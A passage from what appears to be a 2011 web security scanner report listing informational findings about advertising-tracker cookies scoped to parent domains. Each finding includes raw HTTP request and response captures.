qqpxzFI5pWR1qd1OhaEJRBKLAzmtvuivo0-pmNnod7XpkHS_mmXlKfpApTInsgNHms4PzjBXGobcMMMjS9iaNWi3nIBc-51c_JNpPFelEoDpghJ_BqYKOem8Gm5pQ8dK01urDrHrdgdmyMP9WTc5eMuMfkiu-eA3R2-iCXKT-zVBd4UH-JQfMPGyLnI8FUiI8OWL7jpWFWMZXEO7OyP6JiqfKIhCGNeSxq9V44CTPsg5_09Wd_LC0N7IQXI_2WJof_8fVyPUPeh7i9wBeFplG6RcT1DtZks0sgI_IwrDwCsIS7dyiB1wNxFEDYn_de44gYmemzlgWEN26EYZGTlI4Lq2yzlU6q8m2PJX70K9ebeZIcYddS-n-jieHPeyyu_jPtNqgptNcUmlV27b50rDjEeb2aBWozrQGGuaCuFh4EzkxFsuZfPMfz1wEUboblTM7IARMSnc4jK5cJ07WSHutHBj52x3HKg14YQzFgcP1P7PF5ywq-vIL6XCfyxzfzz2QN8CpQbL5XAGhY8gq3gpxC6wpgzazfLg6emeoHtpGq3OLLxjUCIgW6QbledKeLvEwl1YIoSBsuVGm7co3E1SW7gk8dGKQMCkAGpZKu6HCuT5IaT2X4ICpHWp3U6FoQlEEosDOa2-6KcE78SWnWn9Zb9yonwZsEYlrtijogmP4oEG53-k_J-gIZe1NM6Xn8UuPCrNFrZlxt9r7cwJ0GaDm-wxC-RC7eiJ6bwabmlDx0rTW6sOset2ClcZFZrKS1YgYe9ikET6IQCL-FWN7W8AgIfx031UIybpHau0jzO5nZx7UNwc3Fcp5iybN6R1Y4JRoZKSSUbihELGr1XjgJM-yDn_T1Z38sLZJC5nnDEEYiCcbVkukitODRA_AYG_IAioGjDaP-ISMjhJsq43NtGC5w8alVd5Y3W_JVjsDeSQOTbDGWiFedYQaqonMCHOBdi8d64ncpkChEs1qKWeHlrhzJYvLK3U-X10T_mT9KtDivePIKJH6GNW46BRue32KEQLKx6RNT8qd-WiqVu80Hd_1P41FwUMGjlvQh8nhtp-zIq39ERDNVTK0IrUP-Cb_Ttx6GnOadl8nzAGhY8gq3gpxC6wpgzazfLsmMDzWYl67LQ1JPM8EK-GuiGbOzeZcMadWx6wDLtAMkQVPcBJeV_tSNAPqHn9Y96EEZ-kpDRlGoDOTjB8wgMtJHWp3U6FoQlEEosDOa2-6KjCjDtIMrxBp5mvurivaTyXBheiAjiFf5UzegIuH4PUQvF6HeYOl6yqVHlN2N9o11E9eoWE0gjO__pRMYYCNosyxH0ScxZ65NjJ8VJ6s08lUOlo3qTokJN5qzHBCHQVfE1b1R5wcKsxZf4LB5iPER8LvGXO1dAiOp7NxnU6D8mSvlFARj6k9vFL_PsqNx_NNxjUdgOuMKm6J5HDgs5y53qrZJyQVFecTwNKv5u9gz8eOfmncQzsT8YzywYTnISxIiHDXRREkq8K6_Cm8q7fOElewNe0FUGX0hxZNzX4RoxVeIITv1JR3M72AniQ6YsYfQmDHyNp520zI0HtJUF-yqs6-DDZsPbxj6Qgt5rFbggFIVrJR--A2xOt2l_LWMK7tcPGYKlDQExz7jt4XR4fyfzh6Y4d1vzmTMWcXBBW9Bwdgf7tDTwlHeQSy55kAD3G7t5jXWl2cilPuU73Pi5VvtGhRf1Bdy-tAzDWmiMKVJVbOcDmZ5ZA02huibYR0GLuxcJiSODuj1_GH4U3GxuALFLqSDArVvdqWPd1GH0CqEOJoyUsNRGCunARqHY1uoWs0abrh5VidSbzlvpfD9Bzedd0fQ1rNRAD_KliILsqERKBdpCSMMdrRB4h1pI33gcUO4C6n3gIrfyRotW5DbCfDxVHrK9OoZO1MqpMf-cD9MMeDxOsMI2HX50MkvGmhcZ7rIyyEizdkyd46QFUa8WEftR2_ranpFLDpnRWIPNGjFB85-AgYQqi3Ai0ozCyuE1PvWed1Li7rlJAMxp3uhubgLqqen5CtkmryYVTaYla4uKZOoFmK70-d6OBcdxR12uoDe_khu9L8pJ6cznlUJAYbKODyHPR4HRIlAmgaV3jBoguNFhCRsPc48rbhIrukdZcq88n7lUj82FDH58Lhzl730VWgqKvZ5Le44tUEYA8TMW7OkIBh4MsLAyfVn4fGgPUaaOfBE9jjuFfaqW11n4Z8gkLMTpxhxJkjDlSB7t0jcg9SXHexVCHumGFGU6YM9Q8y70R5LfL4BLNtWCdXTLJ8AtVcxNVvqy2ZcWAG-XpWNmIwppcdMqT-TkBX71JftijU2ptQWyE_WdHTddtiLy8MENw12owW6GlcHsm8bU3ZnaOAN1egW49z4weCLEpZILzTJU_ugwz8K5JhQ-DMDFzSxAh1-IGuEN7L1wERO08_NsneUMgmIOM-CdHdrVEKwYjsAqaPrkY0ib7YmiG6LPzAsOwDGEz0q517w5yTLXeP_QAGL2ktWSGsWvV5vNvimLfWzt63bDLkG5l0TfkVsb_CM3xVbtHIkji0PAVOv_qkrD2HBM43r-YwbWOT7PPhjZcBn; fc=xTIbWrtivElq1tUc5tWjJbVvdU6bSGa3te68hWgJRC-cCsKuP_sD1eNstKEGmgqs2CjyBHHN4B50paqel1-StJLdzlSJYnWgjgpSWPKJZqanh77CDv_Cb5k2sLKUWKhY0sNf3mqCcrIxbMgK0qZIglL8KhgM5_wQzjFfm742WtlsRj4DgPxbC0CSbEhxctH3CNlUYOl7xObpPSA_AkNKQIxazefuTbu8OVIWB1hgh0UuQ5WvHyA5163u2A0m1Vwyua7r46nuxletASYocQS1CQ; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C4%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008; rds=15093%7C15093%7C15093%7C15092%7C15085%7C15093%7C15088%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7Cundefined%7C15093; rv=1; pf=iWpxAKbe6dXKyG4kI9LU0TQr6_aV_hWXTsEtRZOgJfGU4lRMcL7m1vqUsiBTZr7RMO7qqq5hFl3uSsnbrtm0AcdiicNNmmE_aI2n_-oR-aSbxFtxY6VXGMaWedmSR5_sZf2e9JPx2W0_L4Yfnte0zVeMKR4WkXgHWfiVoBwANMcKjySply9svk7Zjz1cpf4Bzb5Tt0dQE7jHQc5epS0VRkVIATW7cLC_dfDNtRc55AaPTS0-vn8aJUl_hlPyvPOOtdzUdOc0k8NWJBJOGBK9QZ-lyGHiRYTkQQvITxdIImFBY0mOsZX2h2BPTttOm1Xbc_h5HhDpjIQwIe1q44DX0AG9Q25Hr0TsSXGFhqkVSyhYOo9e-u-S9OqoU54oGyc4eKOevxUxpxyyPlhnEBc9g-hyXq1vQkw6vFA4jx6_C50EFNKdwIC6nJFecFHEvdhoGJRMajhWfp6v36qtQgLomoeO7STcnXJMYxdVzVjC-m3FgjKTWuNYEjtqCRtgViTecSMM7QYznF7B2nS665hlYvalAnAOTSVOdM3F_f9snK6TMaUUr7mVR5XLQhBYqSHioDxtZIA_eLx2S_pX-oLVM25XRL8B07irNS8qlr7ekd1rQ4U8f3BvpBt3a5uXz3WYV2KppMfhFPhtONNbwIev0vTu8RLoHZ9dIHokovwqrwnQOji_IKtCoOfkmPA2GXNZsyEfLkFse-VL4nLB3SN-v7t_hIXf4yquNhsR3qlOcolIxbr8CAsvJn7s9pVERGCv2XgylrDt9qGvfTGyLpv8A2Yde38jaUPKbpopJkL6ubTp98EvwAGJDQCxmpV8QykkAj4Q6BHLoyve-_dzLlVIAQ06eq6t9RXgewAoL0bGKZkTVz9HyqK6lzJ3KzNn4XmhjX4azvEIVOD1XypL8BZ0ZYO5D-OZkr4-zDlwdvTf-FzZ62NZ2vx0847xQd2HiPAVs-Npo0_YWtPEzUNCMo2pgn80M8Yib7rvW7WlT65pK2uB1RKuJg5FS_p7z-IismFNJmnxdDECCARlTTFrZxwoda_KzBssnjAUyi1EkYCCG0j3pThGfwq5Uq0-f6AalaoOF3KASDJInaJTcmELg2xEMdu-KSTPHDRv4T_9SdgFPrBSblm3JwjUk_JyuCwxhJUXK4jbld-yDkb4tl03dxtcWcjoFV_QwjIpyolfrSfHGfHNKI-XeEZ9qQdvn_DOZqfwEmMfhowJdCoCPDrXPF5h1_V_4ID4A02bJp1qiRkqtiXoxNNyV8n3Mw6XuEZmbbAY2KiuuMMPoqqkC11UJ3f0ilmAcq-IQaSbZrb-8189lloCC94FRBPLoiryHccxbJkdIF-ULo-MIaIFfBzk_4K1fDEHbIdULrPVeP4f9gjGzYpqhRCV1kZeWvR_-f0hYA8Lw75Zvr3cnox-DbW0vtRfJ-SLGp5Ew4CpDqVMcjykIV5WgKm8ByrHbLc1WRYSLLdTRJiHTibF2wHwHq4LSkiTl7JnHCAEbLHNUgk8FLdI5Y5GIzEH5KXeZO6VoSww8QwnzpHYjcfw3UjUUBIE5Dj73rTqmIT7eerZylEPy4vu97TRJwAWQNtkfqiEAfr4_0EU; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 29-Oct-2011 02:10:38 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 02 May 2011 02:10:38 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=4222959636846101819&fpid=4&nu=n&t=
...[SNIP]...
16.43. http://segment-pixel.invitemedia.com/set_partner_uid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /set_partner_uid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set_partner_uid?partnerID=79&partnerUID=1754bb650623c5be43fca0b57c3910d9&sscs_active=1 HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID=eyIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjg0IjogWyJRNHpndm5Xczk5OXJUU2hCIiwgdHJ1ZV19; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; camp_freq_p1="eJzjkuF49ZlFgFFi4+0vb1kUGDV2vgTSBowWYD6XCMeK+axA2cl9p4GyDBoMBgwWDEDRnfeZgaKz5q9FiAIA+4cX7Q=="; io_freq_p1="eJzjkuY4HijAKLHx9pe3LAqMGm9BtAGjBZjPJcyxLRQoObnvNFCSQYPBgMGCASi41wUoOGv+WoQgAJWpFmw="; dp_rec="{\"3\": 1303562003+ \"2\": 1304243633}"; segments_p1=eJzjYuZYEMzFzHE0B0hMNwYSjRFcLBwHuxmBzHMgwdM5QH5nBzOQOVEFyNyxi5GLi2PnPmaBWQfnvGMBCv8LBxIbi4Fy6z8wAsknF0Bk038mkBwHkHnoCIi53w/IvLiXCUg2/weRa/czAgCyXiCB

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 01:56:44 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 02-May-2011 01:56:24 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: partnerUID="eyI4NCI6IFsiUTR6Z3ZuV3M5OTlyVFNoQiIsIHRydWVdLCAiMTk5IjogWyJCREZCRkZDMjMxQTI4MkQ2RTI0NDVCOEU0REU0QTJFMCIsIHRydWVdLCAiNDgiOiBbIjYyMTA5NDcwNDc3ODYzMDAyNjgyODMzODQyNjQ4NTQ3MTIyODcwIiwgdHJ1ZV0sICI3OSI6IFsiMTc1NGJiNjUwNjIzYzViZTQzZmNhMGI1N2MzOTEwZDkiLCB0cnVlXX0="; Domain=invitemedia.com; expires=Tue, 01-May-2012 01:56:44 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;
16.44. http://sync.mathtag.com/sync/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync/img?mt_exid=1&type=sync&redir=http%3A%2F%2Fads.adbrite.com%2Fadserver%2Fvdi%2F684339%3Fd%3D%5BVISITORDATA%5D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: sync.mathtag.com
Cookie: uuid=4d50384b-4b5e-0f67-919a-7275589c0b85; ts=1304302151

Response

HTTP/1.1 302 Found
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-x4 pid 0x71da 29146
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 02 May 2011 02:09:31 GMT
Location: http://ads.adbrite.com/adserver/vdi/684339?d=uuid%3D4d50384b-4b5e-0f67-919a-7275589c0b85
Etag: 4d50384b-4b5e-0f67-919a-7275589c0b85
Connection: Keep-Alive
Set-Cookie: ts=1304302171; domain=.mathtag.com; path=/; expires=Tue, 01-May-2012 02:09:31 GMT
Content-Length: 0

16.45. http://tags.bluekai.com/site/2831  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2831

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2831?phint=zip=&phint=age=&phint=gender=&phint=segment=000 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/3945?ret=html&phint=__bk_t%3DLogin%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=25552944
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bklc=4dbe0f3c; bk=VO+y8416vaVVIHOf; bkc=KJpn8s5QIwsRAzsD48XFWy1ex0SxgdR/kSI1h+K3jDeC1NViXgA3DwAFAke86rvGdOQVOJIEkTaCrQAMyISPmlyjG4hfv3CXh6Tsae8/wTpwOruFZXF/LO3JUTws7tvYTcB01E9zZ1b9yA2oHrDfB3e0xEu0Kq5PD16crxIjel/4M9X9/L2WXx==; bko=KJynWtHQLmc48XF/R9BAZRJjlgyxaCBe/oEapeYJeSvmQ6sVMTaCXXG5FQG1AAeVZHDf4wAj3GYLA6+t9wDSLp1yf9mpfQeNoiysLPuOgsyKW9L9NjzRV9==; bkst=KJhkMf2ny69DhtXGYeShQbBxcaye2dw5cqMWs3+YvecSD4cYOScxeisJm9FrhUdOHHxUxx5hzcOtXV2yzcap25votwUpw+dlF3IaUoRHVAnkKeuKNm1pfpkrGEKcBkesnOU9quYP1xcwgxQ1JCOGSb00Y7w9qwoNfd0wIHViXIgxM6mgiWA1GY7MDCeOOeYCMtzUmrt8hmRLWuIi0dqYlZrcNoamAFwLzYevUqolvg5sFm37BBPx8GBIAVfl4grwpgNhfCg3CPWShz1WHtP2WmlnGMyOWNja+M1jpqgTUkmPuL3j9Ay6oPJhGWHBFIdzrmLM8vabRW65UFYMSkiJ3y4cwdtZixxxH7YOYz6Jh+MGwYmQeezb00cEf6IBKfF0ffzdGIjiVQ==; bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9LWDU/L1aGCirsuaAEicJzewXHjnjjLg9T1jj0UYOcuHZjyAi1dZkhHAR+vt9iCkvsWTyQ1xRyYx7flxEHQj2JOAZaJ7q5QQjjCxj5lLxryx3OicjKsFZ1Mv6mp9yoWkD13u9hPTT/a09vF1uuzq9YK/4AetzespmYwdW91meQqKuTxDp0slgluObZYGjswRi0E9pnWSuIKSOqBG8eTHo9aiV1f6=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 02:02:13 GMT
Set-Cookie: bklc=4dbe10a5; expires=Wed, 04-May-2011 02:02:13 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 03 May 2011 02:02:13 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=BN6qAw16vaVVIHOf; expires=Sat, 29-Oct-2011 02:02:13 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpM8tjQWJjZjaQ3L1IUARsOQHd/4dSB9RUFjRpvMtaOXew8sHCIwsjA1mU48XLW8SL2xrDgGdsNSCkxIW0P3c0rYkEIi0HDFgxTvCdAcCi4A8KORqGJ/XwZkEF9fQwhfbZQXC6fsPeT/w6ywCrxFtTr/XB3JcTBs7IvYRnw0zU9zs9b9yGdoHZPf2i90Q4H0mq5PAWNcIxIjef/4E9I9aW+E6D=; expires=Sat, 29-Oct-2011 02:02:13 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhkMpNn96WxC3z/YYRhQ3Dxnsyw27BtathiwvwYWKJouLD22C9YuHcrE30a21sdAWRDs6WnLqYy+FWlVBMRtq3UvriDppypX6Ta7ozOki9qeGSMR7CKKTG3XmgHJiEz1R7YODoqsTMD0z9uiGahNZZ7iDeYo82ll724UYWqnh82KfxsUOaWyfCxAAGrAD+p1gdx3/vFtV3oH+VabSl82aUNlXJgMpq92cGU0PaUj7+Ld6h+e6EKiPkL1Wrf7UsX6d8ow7Cl8+NNSn4Ym/pbwHJZhVaTG1qjv5oVwA8tHTB8ic3+p1QDWNyMGRRhoxD03354+ff5g9wDGmQbVfxrhUcKpIUAlFmwKokW/DGgCuuDojxxRAtSDBHVVJmAZJilh2v2V47pt0XbhaI+; expires=Sat, 29-Oct-2011 02:02:13 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 03-May-2011 02:02:13 GMT; path=/; domain=.bluekai.com
BK-Server: c53d
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
16.46. http://tags.bluekai.com/site/2893  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2893

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2893?id=3419824627245671268 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/3945?ret=html&phint=__bk_t%3DLogin%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=25552944
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bklc=4dbe0f3c; bk=VO+y8416vaVVIHOf; bkc=KJpn8s5QIwsRAzsD48XFWy1ex0SxgdR/kSI1h+K3jDeC1NViXgA3DwAFAke86rvGdOQVOJIEkTaCrQAMyISPmlyjG4hfv3CXh6Tsae8/wTpwOruFZXF/LO3JUTws7tvYTcB01E9zZ1b9yA2oHrDfB3e0xEu0Kq5PD16crxIjel/4M9X9/L2WXx==; bko=KJynWtHQLmc48XF/R9BAZRJjlgyxaCBe/oEapeYJeSvmQ6sVMTaCXXG5FQG1AAeVZHDf4wAj3GYLA6+t9wDSLp1yf9mpfQeNoiysLPuOgsyKW9L9NjzRV9==; bkst=KJhkMf2ny69DhtXGYeShQbBxcaye2dw5cqMWs3+YvecSD4cYOScxeisJm9FrhUdOHHxUxx5hzcOtXV2yzcap25votwUpw+dlF3IaUoRHVAnkKeuKNm1pfpkrGEKcBkesnOU9quYP1xcwgxQ1JCOGSb00Y7w9qwoNfd0wIHViXIgxM6mgiWA1GY7MDCeOOeYCMtzUmrt8hmRLWuIi0dqYlZrcNoamAFwLzYevUqolvg5sFm37BBPx8GBIAVfl4grwpgNhfCg3CPWShz1WHtP2WmlnGMyOWNja+M1jpqgTUkmPuL3j9Ay6oPJhGWHBFIdzrmLM8vabRW65UFYMSkiJ3y4cwdtZixxxH7YOYz6Jh+MGwYmQeezb00cEf6IBKfF0ffzdGIjiVQ==; bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9LWDU/L1aGCirsuaAEicJzewXHjnjjLg9T1jj0UYOcuHZjyAi1dZkhHAR+vt9iCkvsWTyQ1xRyYx7flxEHQj2JOAZaJ7q5QQjjCxj5lLxryx3OicjKsFZ1Mv6mp9yoWkD13u9hPTT/a09vF1uuzq9YK/4AetzespmYwdW91meQqKuTxDp0slgluObZYGjswRi0E9pnWSuIKSOqBG8eTHo9aiV1f6=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 02:04:03 GMT
Set-Cookie: bklc=4dbe1113; expires=Wed, 04-May-2011 02:04:03 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 03 May 2011 02:04:03 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=gA7hed16vaVVIHOf; expires=Sat, 29-Oct-2011 02:04:03 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpp8VjQI17Y0Y9Lr1IUARsOyH4/B2JCxmccLYeTZ4y1eeXK1pvRXrdpjRn0NHbCXoUHIa3NeYCXoAoDwkzavF2aWio4VC0Pel/wM1dJ0X9ylRuHR4wvcVelQ4MlPae8Mo61vc0x4Ci4ezC4B8KHREDuFySBwXDWyK4ARZ9T1J6OCjduM1olqWekQtCAXtbgGJGwzCX0cIxIsOX98U5nHx==; expires=Sat, 29-Oct-2011 02:04:03 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhkMp2n96WDhnz/YYRhuWGCVBQKfndl5C5LRM0MxQMhBvUic7L/QSx/504VxFgQPf9HhDqxxiyLgslXeORt5gqrUHV6dzl1ZlAPXgh10OJJhbwhJOI4Nj8ba4n36xSJCKm96QPvVhF/hWaQvzw9mmr66Nxia4wwmI2dUpyOMHKwFMN3W3WGGraYvZ9Q99VRTfvCDPN/qJSJUgP1usR6kXQPkTYvz5EBNDvIgwfgrwJG7jMOTeyIfWmb0d5mN5j/j+t/HyqEoBI5H+r572Se2N8ffhgo+11Gf96cBWppQlO4E51E+mNLsr21HrVrK36RDjxnMjxjpoUtR8iK42NbrPD7oWq0FgB8I6/Kjz11jFKK42unJxGHnWiQMYK1DZoBWMwDPkGEJhiq+X4YKfw08dP4OZJMaQ==; expires=Sat, 29-Oct-2011 02:04:03 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 03-May-2011 02:04:03 GMT; path=/; domain=.bluekai.com
BK-Server: f349
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
16.47. http://tags.bluekai.com/site/3754  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3754

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3754?phint=ea%3DNA&phint=eb%3DNA&phint=ec%3DNA&phint=ed%3DNA&phint=ee%3DNA&ret=html&id=PARTNER_UUID HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/3945?ret=html&phint=__bk_t%3DLogin%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=25552944
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
